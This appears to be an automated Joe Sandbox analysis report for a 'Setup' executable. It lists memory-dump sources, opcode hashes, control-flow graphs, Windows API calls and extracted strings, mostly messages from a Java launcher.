• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                            APIs
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo
• String ID:
• API String ID: 474895018-0
• Opcode ID: e75d1316f7690e78a1b7bbe4b8fd434e354be019a45c5af86f04e4cb43f49289
• Instruction ID: e3e44065f9a9ceff7be62db99877426eb0a27b9c05323b31d2cf6afded080bb9
• Opcode Fuzzy Hash: e75d1316f7690e78a1b7bbe4b8fd434e354be019a45c5af86f04e4cb43f49289
• Instruction Fuzzy Hash: 2D71D922F0C142E5F7646E2694C0B7BE286BF40760FBC4739EA5D576D5DE3DE840A620
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f61a71708abe6b8fd764cc3abb1ac03a169177ddefacac8889ebf8fd77858dc
• Instruction ID: 16fc040cd6e3f74640427b072176f004ad66c7a31357181c1fe9d28683fcdab0
• Opcode Fuzzy Hash: 4f61a71708abe6b8fd764cc3abb1ac03a169177ddefacac8889ebf8fd77858dc
• Instruction Fuzzy Hash: C451D622B0869195F720EF73E9809AEBBA5AB407D4FA44235EE5C97B85DF3CD501C740
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
• Opcode ID: a558066dccb20300c2ed8870496e8d60fc2d09facd4851caef8dcd3dae15fdc6
• Instruction ID: 2abdcbd3e68c42b7a4f120617a59c9d7dc86d6b52a5c141515d85dd535b18cbe
• Opcode Fuzzy Hash: a558066dccb20300c2ed8870496e8d60fc2d09facd4851caef8dcd3dae15fdc6
• Instruction Fuzzy Hash: 1D71E411A0C646E6FA66AE1B50C0BFAE7B29B51B48FE41135DD49076D9CF2DF842C321
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
• Opcode ID: 3599b47a282c3c01b9b0489b23f22b425611f643850141a40b2ffdc2dc5c9ed3
• Instruction ID: 1004d28477dbcb93efabcde41e9a9471178402c8bfd3d7f59c6c615404bbb6dd
• Opcode Fuzzy Hash: 3599b47a282c3c01b9b0489b23f22b425611f643850141a40b2ffdc2dc5c9ed3
• Instruction Fuzzy Hash: 73611B21A0D242E6FA666D1B5080FBBD7B29F55744FF80131DD490BFC9CE6DE8468321
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 961a36b829703b04ce8db46bb0b4062e1a9c829ab9d839192e5b6f0db5d2305e
• Instruction ID: ec1b93069247daad20006459087beb2b4a1ca51134e90fe43fa2cef04262829a
• Opcode Fuzzy Hash: 961a36b829703b04ce8db46bb0b4062e1a9c829ab9d839192e5b6f0db5d2305e
• Instruction Fuzzy Hash: 4B914B36B18242D6FA656D279490BBB9A80BF40784FBC1139DD2E677C0DE3DE905E620
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a1e12706ec43ec9c9275fc6a742fd6c23767f2cd031f8989d8cce6e74dae816
• Instruction ID: 8c3ecffddbe76cbd9c0b47991f17643cd9e39945d25c23b266f6844cdded640c
• Opcode Fuzzy Hash: 4a1e12706ec43ec9c9275fc6a742fd6c23767f2cd031f8989d8cce6e74dae816
• Instruction Fuzzy Hash: 39716A72B14155DAEA269F6BB558F7A7BA8F3447C8F925031DF4A07B44CA3CE404C760
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 9a3a534b085362e43156d84b0566409aa2cee27b7730dda760b5abe8302e17e4
• Instruction ID: ea98de99f8a9d04771a44645b44fcfe045330cf167a3ebbc9fef48cd527b5317
• Opcode Fuzzy Hash: 9a3a534b085362e43156d84b0566409aa2cee27b7730dda760b5abe8302e17e4
• Instruction Fuzzy Hash: FE41E222714A5992FF04DF2BD9945AAB3A1BB8CFD4B999136EE0D97B58DE3CC0018300
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6da283c75ea1dbc9bd88145ed251b46990280ded1a85bbeffe29480dd7970cb7
                                                                                                                                                                                                            • Instruction ID: f3641a385083175920f72de5c3f051c768d7b9b3e5b1ff6081d4d84fdaffa199
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6da283c75ea1dbc9bd88145ed251b46990280ded1a85bbeffe29480dd7970cb7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C31A3B2E1C153E6F6797E2B85D4E3B9542AF83340EFC9030D52D26A89CC2DB5457920
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 14798f9b8cc5b6a9c4efe69474c430c64b596e6a23c69794be42c2b676dbfa3b
                                                                                                                                                                                                            • Instruction ID: 29ccf9c6ef7db490f5641b09dd1523be932c2e6fb257f308918f1e31c0c752c4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14798f9b8cc5b6a9c4efe69474c430c64b596e6a23c69794be42c2b676dbfa3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CF06871B19295DBEB949F2DA483A2D77D0E708380FA08039D78DC3B04D63C9054CF14

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 522 7ff764a12be4-7ff764a12c25 523 7ff764a13098-7ff764a1309a 522->523 524 7ff764a12c2b-7ff764a12c2e 522->524 527 7ff764a130a7-7ff764a130ac 523->527 528 7ff764a1309c-7ff764a130a3 523->528 525 7ff764a1308e-7ff764a13093 524->525 526 7ff764a12c34-7ff764a12c4b call 7ff764a257e0 524->526 525->523 534 7ff764a13069-7ff764a1306b 526->534 535 7ff764a12c51-7ff764a12c62 call 7ff764a257e0 526->535 529 7ff764a1310c-7ff764a1310f 527->529 530 7ff764a130ae-7ff764a130b1 527->530 528->527 532 7ff764a13113-7ff764a13115 529->532 530->532 536 7ff764a13117-7ff764a13119 532->536 537 7ff764a1311d 532->537 540 7ff764a13071-7ff764a13080 call 7ff764a13de4 534->540 541 7ff764a13103-7ff764a1310a 534->541 535->534 547 7ff764a12c68-7ff764a12c79 call 7ff764a257e0 535->547 536->537 538 7ff764a13120 537->538 542 7ff764a13122-7ff764a13136 538->542 551 7ff764a13082-7ff764a13088 540->551 545 7ff764a130ba-7ff764a130cb call 7ff764a16630 541->545 545->538 553 7ff764a12c7b-7ff764a12c7d 547->553 554 7ff764a12c8c-7ff764a12c9d call 7ff764a257e0 547->554 551->524 551->525 555 7ff764a130b3 553->555 556 7ff764a12c83-7ff764a12c87 553->556 559 7ff764a130fb-7ff764a13101 554->559 560 7ff764a12ca3-7ff764a12cb4 call 7ff764a257e0 554->560 555->545 556->551 559->538 560->559 563 7ff764a12cba-7ff764a12ccb call 7ff764a257e0 560->563 563->559 566 7ff764a12cd1-7ff764a12ce2 call 7ff764a257e0 563->566 569 7ff764a12ce8-7ff764a12cf9 call 7ff764a257e0 566->569 570 7ff764a130f3-7ff764a130f9 566->570 573 7ff764a12cfb-7ff764a12d01 569->573 574 7ff764a12d06-7ff764a12d17 call 7ff764a257e0 569->574 570->538 573->551 577 7ff764a130eb-7ff764a130f1 574->577 578 7ff764a12d1d-7ff764a12d2e call 7ff764a257e0 574->578 577->538 581 7ff764a13060-7ff764a13067 578->581 582 7ff764a12d34-7ff764a12d45 call 7ff764a1124c 578->582 
581->551 582->581 585 7ff764a12d4b-7ff764a12d5c call 7ff764a257e0 582->585 588 7ff764a12d6a-7ff764a12d7b call 7ff764a257e0 585->588 589 7ff764a12d5e-7ff764a12d65 585->589 595 7ff764a130cd-7ff764a130e9 call 7ff764a122a0 588->595 596 7ff764a12d81-7ff764a12d92 call 7ff764a257e0 588->596 590 7ff764a12e7e-7ff764a12e85 call 7ff764a117b4 589->590 590->551 595->542 601 7ff764a12da0-7ff764a12db1 call 7ff764a257e0 596->601 602 7ff764a12d94-7ff764a12d9b 596->602 605 7ff764a12dbf-7ff764a12dd0 call 7ff764a257e0 601->605 606 7ff764a12db3-7ff764a12dba 601->606 602->590 609 7ff764a12dde-7ff764a12def call 7ff764a257e0 605->609 610 7ff764a12dd2-7ff764a12dd9 605->610 606->590 613 7ff764a12dfd-7ff764a12e0e call 7ff764a257e0 609->613 614 7ff764a12df1-7ff764a12df8 609->614 610->590 617 7ff764a12e19-7ff764a12e2a call 7ff764a257e0 613->617 618 7ff764a12e10-7ff764a12e17 613->618 614->590 621 7ff764a12e2c-7ff764a12e33 617->621 622 7ff764a12e35-7ff764a12e46 call 7ff764a257e0 617->622 618->590 621->590 622->621 625 7ff764a12e48-7ff764a12e59 call 7ff764a257e0 622->625 628 7ff764a12e5b-7ff764a12e62 625->628 629 7ff764a12e64-7ff764a12e75 call 7ff764a257e0 625->629 628->590 632 7ff764a12e77 629->632 633 7ff764a12e8a-7ff764a12e9e call 7ff764a1124c 629->633 632->590 636 7ff764a12edb-7ff764a12ee9 call 7ff764a1124c 633->636 637 7ff764a12ea0-7ff764a12eb8 call 7ff764a1f730 call 7ff764a111b8 633->637 642 7ff764a13028-7ff764a13047 call 7ff764a1f730 call 7ff764a111b8 636->642 643 7ff764a12eef-7ff764a12f00 call 7ff764a1124c 636->643 649 7ff764a12eca-7ff764a12ed6 call 7ff764a14560 637->649 650 7ff764a12eba-7ff764a12ec5 637->650 654 7ff764a1304a call 7ff764a14560 642->654 643->642 653 7ff764a12f06-7ff764a12f17 call 7ff764a1124c 643->653 660 7ff764a1304f-7ff764a1305e call 7ff764a117b4 649->660 650->654 653->642 663 7ff764a12f1d-7ff764a12f2e call 7ff764a1124c 653->663 654->660 660->551 663->642 667 7ff764a12f34-7ff764a12f45 call 7ff764a257e0 663->667 670 7ff764a13017-7ff764a13026 call 7ff764a16630 667->670 671 
7ff764a12f4b-7ff764a12f5c call 7ff764a257e0 667->671 670->551 671->670 676 7ff764a12f62-7ff764a12f73 call 7ff764a257e0 671->676 676->670 679 7ff764a12f79-7ff764a12f8a call 7ff764a1124c 676->679 679->551 682 7ff764a12f90-7ff764a12fa1 call 7ff764a257e0 679->682 682->551 685 7ff764a12fa7-7ff764a12fb8 call 7ff764a257e0 682->685 685->551 688 7ff764a12fbe-7ff764a12fcf call 7ff764a1124c 685->688 688->551 691 7ff764a12fd5-7ff764a12fdf call 7ff764a16ec0 688->691 691->551 694 7ff764a12fe5-7ff764a12ff6 call 7ff764a1124c 691->694 694->551 697 7ff764a12ffc-7ff764a1300d call 7ff764a1124c 694->697 697->551 700 7ff764a1300f-7ff764a13012 697->700 700->590
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID:
• String ID: %s full version "%s"$-Dsun.java.launcher.diag=true$-X%s$-Xdebug$-Xdiag$-Xfuture$-Xnoclassgc$-Xrunhprof:cpu=old,file=%s$-Xrunhprof:cpu=old,file=java.prof$-XshowSettings$-XshowSettings:$-Xt$-Xtm$-Xverify:all$-Xverify:none$-Xverify:remote$-checksource$-classpath$-cp$-cs$-d32$-d64$-debug$-fullversion$-help$-jar$-jre-restrict-search$-ms$-mx$-no-jre-restrict-search$-noasyncgc$-noclassgc$-noverify$-oss$-prof$-showversion$-splash:$-ss$-tm$-verbose:gc$-verbosegc$-verify$-verifyremote$-version$-version:$Error: %s requires class path specification$Error: %s requires jar file specification$Warning: %s option is no longer supported.
• API String ID: 0-425787817
• Opcode ID: 7f036084960183b661eefc96a1ce56b9723c185c94b0e4ace30ccc05ddc543be
• Instruction ID: 59b13928f68bee6c13acb496809f3b6372ce11ea0440fe99a00e55fd0d5797b0
• Opcode Fuzzy Hash: 7f036084960183b661eefc96a1ce56b9723c185c94b0e4ace30ccc05ddc543be
• Instruction Fuzzy Hash: 54E11460A0C603F0FA52FF179AC1AB9A7A96F457C0FE44031DD4E97A96EF6CE5058321

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                            control_flow_graph 701 7ff764a1230c-7ff764a12394 call 7ff764a16ebc call 7ff764a15660 call 7ff764a1bb50 call 7ff764a111b0 710 7ff764a12413-7ff764a12432 call 7ff764a111e4 701->710 711 7ff764a12396-7ff764a123ea call 7ff764a1115c * 4 701->711 719 7ff764a12438-7ff764a12442 710->719 720 7ff764a12830-7ff764a12843 call 7ff764a16630 call 7ff764a1fb70 710->720 711->710 740 7ff764a123ec 711->740 722 7ff764a12460-7ff764a1246e 719->722 723 7ff764a12444-7ff764a1245a call 7ff764a14088 719->723 729 7ff764a12479-7ff764a12484 722->729 730 7ff764a12470-7ff764a12473 722->730 723->722 751 7ff764a127c6 723->751 731 7ff764a12487 call 7ff764a16114 729->731 730->729 735 7ff764a1252c-7ff764a12534 730->735 736 7ff764a1248c-7ff764a12492 731->736 737 7ff764a1253a-7ff764a12541 735->737 738 7ff764a127ae-7ff764a127c4 call 7ff764a13138 735->738 741 7ff764a124d8-7ff764a124df call 7ff764a16630 736->741 742 7ff764a12494-7ff764a124c5 736->742 737->738 743 7ff764a12547-7ff764a1254a 737->743 738->751 763 7ff764a127f7-7ff764a12803 738->763 746 7ff764a123ef-7ff764a12411 call 7ff764a1115c 740->746 755 7ff764a124e4-7ff764a124f1 741->755 742->741 758 7ff764a124c7-7ff764a124d6 742->758 743->738 750 7ff764a12550-7ff764a12553 743->750 746->710 750->738 756 7ff764a12559-7ff764a12569 750->756 754 7ff764a127ca call 7ff764a16904 751->754 764 7ff764a127cf-7ff764a127db 754->764 769 7ff764a1251f-7ff764a12526 755->769 770 7ff764a124f3-7ff764a124f7 call 7ff764a16904 755->770 760 7ff764a1256b 756->760 761 7ff764a12592-7ff764a1259e call 7ff764a111e4 call 7ff764a111b0 756->761 758->755 766 7ff764a1256e-7ff764a12590 call 7ff764a111e4 760->766 786 7ff764a125bf-7ff764a125c6 call 7ff764a111b0 761->786 787 7ff764a125a0-7ff764a125ba call 7ff764a15660 call 7ff764a15638 call 7ff764a112a8 761->787 779 7ff764a12813-7ff764a1281d 
763->779 780 7ff764a12805-7ff764a12811 call 7ff764a16630 763->780 782 7ff764a127e9-7ff764a127f5 764->782 783 7ff764a127dd-7ff764a127e4 call 7ff764a16630 764->783 766->761 775 7ff764a12528 769->775 776 7ff764a124fc-7ff764a12508 769->776 770->776 775->735 789 7ff764a12518-7ff764a1251a 776->789 790 7ff764a1250a-7ff764a12516 call 7ff764a16630 776->790 797 7ff764a1281f-7ff764a1282f 779->797 780->779 782->797 783->782 802 7ff764a12627-7ff764a12646 call 7ff764a128b4 786->802 803 7ff764a125c8-7ff764a125fc call 7ff764a1115c * 2 786->803 787->786 789->782 790->789 802->751 814 7ff764a1264c-7ff764a1264f 802->814 803->802 813 7ff764a125fe-7ff764a12602 803->813 815 7ff764a12605-7ff764a12621 call 7ff764a1115c 813->815 816 7ff764a12651-7ff764a1265d call 7ff764a16630 814->816 817 7ff764a12662-7ff764a12674 call 7ff764a11d58 814->817 826 7ff764a12623 815->826 816->764 824 7ff764a12687-7ff764a126aa 817->824 825 7ff764a12676-7ff764a12685 call 7ff764a16630 817->825 824->825 831 7ff764a126ac-7ff764a126bb 824->831 830 7ff764a126be-7ff764a126cb 825->830 826->802 830->751 834 7ff764a126d1-7ff764a126d4 830->834 831->830 834->816 835 7ff764a126da-7ff764a126fb call 7ff764a16ebc 834->835 835->754 839 7ff764a12701-7ff764a1272b 835->839 839->751 842 7ff764a12731-7ff764a12734 839->842 842->816 843 7ff764a1273a-7ff764a1275b call 7ff764a156ac 842->843 843->751 847 7ff764a1275d-7ff764a12760 843->847 847->816 848 7ff764a12766-7ff764a1279a 847->848 852 7ff764a127aa-7ff764a127ac 848->852 853 7ff764a1279c-7ff764a127a8 call 7ff764a16630 848->853 852->782 853->852
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: wprintf$FrequencyPerformanceQuery
• String ID: argv[%2d] = '%s'$ option[%2d] = '%s'$%ld micro seconds to InitializeJVM$%s is '%s'$()Ljava/lang/Class;$()V$([Ljava/lang/String;)V$App's argc is %d$Error: A JNI error has occurred, please check your installation and try again$Error: Could not create the Java Virtual Machine.Error: A fatal exception has occurred. Program will exit.$Error: Could not detach main thread.Error: A JNI error has occurred, please check your installation and try again$JNI_FALSE$JNI_TRUE$JavaVM args: $getApplicationClass$ignoreUnrecognized is %s, $main$nOptions is %ld$print$println$sun/misc/Version$version 0x%08lx,
• API String ID: 55271498-324781675
• Opcode ID: a2830ed6dd11f73e3a7db01377140e82db5158da22dd514a3a82fd16b2e03892
• Instruction ID: c92c70004b84bd8f437e002933c6175c8add93a05e9c0d08ea1ce04f009d2426
• Opcode Fuzzy Hash: a2830ed6dd11f73e3a7db01377140e82db5158da22dd514a3a82fd16b2e03892
• Instruction Fuzzy Hash: 77F14F62B09A42E5EB02EF67D8C09F9A771BF95B84BA40036DD0D537A5DE3CE449C360

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                            control_flow_graph 1371 7ff764a15c4c-7ff764a15ca4 call 7ff764a11d94 GetModuleFileNameA 1374 7ff764a160f9-7ff764a16113 call 7ff764a16728 call 7ff764a1fb70 1371->1374 1375 7ff764a15caa-7ff764a15caf 1371->1375 1375->1374 1376 7ff764a15cb5-7ff764a15ced call 7ff764a112a8 * 2 call 7ff764a1f730 call 7ff764a2a3e4 1375->1376 1389 7ff764a16057-7ff764a16086 call 7ff764a1ac60 1376->1389 1390 7ff764a15cf3-7ff764a15d66 call 7ff764a16934 GetCommandLineA call 7ff764a1127c call 7ff764a1709c call 7ff764a1f730 * 2 call 7ff764a111b8 call 7ff764a1bfb8 1376->1390 1407 7ff764a15d87-7ff764a15dac call 7ff764a25710 call 7ff764a25670 * 2 1390->1407 1408 7ff764a15d68-7ff764a15d77 call 7ff764a1bfb8 1390->1408 1419 7ff764a15db1-7ff764a15db7 1407->1419 1408->1407 1413 7ff764a15d79-7ff764a15d85 call 7ff764a25710 1408->1413 1413->1419 1420 7ff764a15dbc 1419->1420 1421 7ff764a15f78-7ff764a15f87 call 7ff764a111e4 call 7ff764a111b0 1420->1421 1422 7ff764a15dc2-7ff764a15dd2 call 7ff764a1709c 1420->1422 1433 7ff764a15f89-7ff764a15fca call 7ff764a1127c call 7ff764a1709c call 7ff764a1115c * 2 call 7ff764a111e4 1421->1433 1434 7ff764a15fcf-7ff764a16053 call 7ff764a1cbc8 call 7ff764a27088 call 7ff764a1cbc8 call 7ff764a27088 call 7ff764a1bb50 * 2 CreateProcessA 1421->1434 1428 7ff764a15dd8-7ff764a15df4 call 7ff764a1f730 call 7ff764a111b8 1422->1428 1429 7ff764a15f2a-7ff764a15f32 1422->1429 1442 7ff764a15e49-7ff764a15e4b 1428->1442 1429->1420 1433->1434 1496 7ff764a1609f-7ff764a160b1 WaitForSingleObject 1434->1496 1497 7ff764a16055-7ff764a1609e call 7ff764a16728 call 7ff764a1fb70 1434->1497 1445 7ff764a15e4d-7ff764a15e53 1442->1445 1446 7ff764a15df6-7ff764a15df9 1442->1446 1449 7ff764a15f37-7ff764a15f73 call 7ff764a25670 * 4 call 7ff764a111e4 1445->1449 1450 7ff764a15e59-7ff764a15e6a call 7ff764a257e0 
1445->1450 1451 7ff764a15dfb-7ff764a15dfe 1446->1451 1452 7ff764a15e44 1446->1452 1449->1421 1467 7ff764a15e6c-7ff764a15e7d call 7ff764a257e0 1450->1467 1468 7ff764a15ed6-7ff764a15f03 call 7ff764a25670 * 2 call 7ff764a1709c 1450->1468 1457 7ff764a15e3f-7ff764a15e41 1451->1457 1458 7ff764a15e00-7ff764a15e16 call 7ff764a25d80 1451->1458 1454 7ff764a15e47 1452->1454 1454->1442 1457->1452 1475 7ff764a15e38-7ff764a15e3b 1458->1475 1476 7ff764a15e18-7ff764a15e25 1458->1476 1467->1468 1488 7ff764a15e7f-7ff764a15e96 call 7ff764a1f7f0 1467->1488 1505 7ff764a15f22-7ff764a15f25 call 7ff764a111e4 1468->1505 1512 7ff764a15f05-7ff764a15f14 call 7ff764a25670 1468->1512 1484 7ff764a15e3d 1475->1484 1485 7ff764a15e2e-7ff764a15e35 1475->1485 1476->1454 1482 7ff764a15e27-7ff764a15e2a 1476->1482 1482->1476 1489 7ff764a15e2c 1482->1489 1484->1454 1485->1475 1504 7ff764a15e9c-7ff764a15ead call 7ff764a257e0 1488->1504 1488->1505 1489->1454 1500 7ff764a160c9-7ff764a160d0 call 7ff764a16630 1496->1500 1501 7ff764a160b3-7ff764a160c5 GetExitCodeProcess 1496->1501 1497->1496 1515 7ff764a160d5 1500->1515 1509 7ff764a160c7 1501->1509 1510 7ff764a160d9-7ff764a160f8 CloseHandle * 2 call 7ff764a1fb70 1501->1510 1504->1505 1522 7ff764a15eaf-7ff764a15ec0 call 7ff764a257e0 1504->1522 1505->1429 1509->1515 1510->1374 1525 7ff764a15f17-7ff764a15f1f call 7ff764a25670 1512->1525 1515->1510 1522->1505 1529 7ff764a15ec2-7ff764a15ed4 call 7ff764a25670 1522->1529 1525->1505 1529->1525
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CloseHandleProcesswprintf$CodeCommandCreateExitFileLineMessageModuleNameObjectSingleWait_invalid_parameter_noinfo
• String ID: %s\bin\%s.exe$-classpath$-cp$-jre-restrict-search$-no-jre-restrict-search$-version:$Error: CreateProcess(%s, ...) failed:$Error: Unable to resolve %s$Error: WaitForSingleObject() failed.$ExecJRE: new: %s$ExecJRE: old: %s$ReExec Args: %s$ReExec Command: %s (%s)
• API String ID: 2354071828-2302492997
• Opcode ID: 155a8a214b59518197faade966d3838315f6f093e45cc8a2a11e5612f3aa2eb2
• Instruction ID: f59495b29a0eb49736cc63b4b25b86d05f887684f83b059181127244d017a3da
• Opcode Fuzzy Hash: 155a8a214b59518197faade966d3838315f6f093e45cc8a2a11e5612f3aa2eb2
• Instruction Fuzzy Hash: F2D17E61E08642E6FA02FF63D8D1AB9E361BF85780FE44435D94D87796EE6CE5058320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: wprintf$CurrentProcess
• String ID: %s%d$%s%d=%s$-$-$-XX:NativeMemoryTracking=$-classpath$-cp$-fullversion$-help$-jar$-version$TRACER_MARKER: NativeMemoryTracking: env var is %s$TRACER_MARKER: NativeMemoryTracking: got value %s$TRACER_MARKER: NativeMemoryTracking: putenv arg %s
• API String ID: 2490283382-3922024441
• Opcode ID: 2ab74741108a55d3cfd27af9a4642a2124bf9988204b8e18245889c09d8eede1
• Instruction ID: 3847cc6b371d317ecee59ae2fd7fc3757340592f5255a678bc09fbdf6af709d6
• Opcode Fuzzy Hash: 2ab74741108a55d3cfd27af9a4642a2124bf9988204b8e18245889c09d8eede1
• Instruction Fuzzy Hash: 59514E60E09743E0FA02BF17A9C09B9D3A56F85BC4FE80431ED4E97297EE6CE5018324
APIs
  • Part of subcall function 00007FF764A15660: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF764A13857), ref: 00007FF764A15674
  • Part of subcall function 00007FF764A1FD30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A1FC99
• wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF764A1386E
  • Part of subcall function 00007FF764A16630: MessageBoxA.USER32 ref: 00007FF764A166D2
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: FrequencyMessagePerformanceQuery_invalid_parameter_noinfowprintf
• String ID: name: %s vmType: %s alias: %s$ name: %s vmType: %s server_class: %s$%ld micro seconds to parse jvm.cfg$ALIASED_TO$ERROR$Error: could not open `%s'$IF_SERVER_CLASS$IGNORE$KNOWN$VM_ALIASED_TO$VM_IF_SERVER_CLASS$WARN$Warning: Missing VM type on line %d of `%s'$Warning: Missing server class VM on line %d of `%s'$Warning: No leading - on line %d of `%s'$Warning: Unknown VM type on line %d of `%s'$jvm.cfg[%d] = ->%s<-
• API String ID: 2156942979-2085308502
• Opcode ID: cb4146e40dd08ca8a27a13731992efbe169cded30751264641f7d419cabc5844
• Instruction ID: ab5ff7ddb9dfcc5f3baf223bae93b28a0422115f2bdd3508cc2c31a92e444232
• Opcode Fuzzy Hash: cb4146e40dd08ca8a27a13731992efbe169cded30751264641f7d419cabc5844
• Instruction Fuzzy Hash: 78C19165A0C642E1FA12FF13E8D0AB9E7B1AF99784FE44135D98E47796DE3CE4058320
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
